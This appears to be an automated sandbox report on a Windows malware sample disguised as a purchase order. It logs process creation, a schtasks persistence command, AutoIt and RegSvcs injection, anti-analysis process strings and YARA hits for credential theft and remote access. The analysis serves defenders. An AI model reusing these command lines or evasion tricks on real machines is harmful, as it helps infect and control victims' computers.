                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FEBE5 mouse_event,8_2_005FEBE5
                          Source: C:\Users\user\Desktop\PO3311926.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xlJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin sdadbtvsh.bin nngqrvwq.xlJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"Jump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005F13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,8_2_005F13F2
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005F1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_005F1EF3
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C36000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: sdadbtvsh.bin.exe, 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" ThenfE
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1599039739.0000000001739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: sdadbtvsh.bin, sdadbtvsh.bin.exeBinary or memory string: Shell_TrayWnd
                          Source: sdadbtvsh.bin, 00000008.00000002.1603220411.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1744085917.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
                          Source: nngqrvwq.xl.0.dr, nngqrvwq.xl.8.drBinary or memory string: If WinGetText("Program Manager") = "0" Then

                          Language, Device and Operating System Detection

                          barindex
                          Source: Yara matchFile source: 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2130760562.0000000001754000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\wrse\nngqrvwq.xl, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\nngqrvwq.xl, type: DROPPED
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBF654 cpuid 0_2_00BBF654
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00BBAF0F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Roaming\RegSvcs.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00BBDF1E
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005EE5F8 GetUserNameW,8_2_005EE5F8
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005CBCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_005CBCF2
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BAB146 GetVersionExW,0_2_00BAB146
                          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: sdadbtvsh.bin.exe, 00000014.00000003.1752201411.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000002.1753734876.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1746299936.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1740437603.0000000000E35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGUI.exe
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208129774.00000000017B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598450834.000000000175C000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598346984.000000000174F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 21.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000023.00000003.2166043970.0000000001832000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2160394335.000000000182A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.1557524427.00000000017C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1916712063.0000000004046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1916641917.0000000001682000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.1565296596.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.1557460063.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.1714503367.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2166138425.00000000041ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2160342151.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1702942543.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1703000356.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.1565515689.0000000004098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1693784199.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1916546017.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1906750023.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1702531700.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2165918664.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1693739321.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.1565342745.00000000017AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1916582807.0000000001665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1906792983.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1702562774.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2165964691.0000000001814000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1036, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR
                          Source: sdadbtvsh.bin.exeBinary or memory string: WIN_81
                          Source: sdadbtvsh.bin.exeBinary or memory string: WIN_XP
                          Source: sdadbtvsh.bin.8.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                          Source: sdadbtvsh.bin.exeBinary or memory string: WIN_XPe
                          Source: sdadbtvsh.bin.exeBinary or memory string: WIN_VISTA
                          Source: sdadbtvsh.bin.exeBinary or memory string: WIN_7
                          Source: sdadbtvsh.bin.exeBinary or memory string: WIN_8

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 21.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000023.00000003.2166043970.0000000001832000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2160394335.000000000182A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.1557524427.00000000017C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1916712063.0000000004046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1916641917.0000000001682000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.1565296596.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.1557460063.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.1714503367.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2166138425.00000000041ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2160342151.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1702942543.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1703000356.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.1565515689.0000000004098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1693784199.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1916546017.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1906750023.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1702531700.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2165918664.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1693739321.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.1565342745.00000000017AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1916582807.0000000001665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.1906792983.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000003.1702562774.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2165964691.0000000001814000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1036, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00612163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_00612163
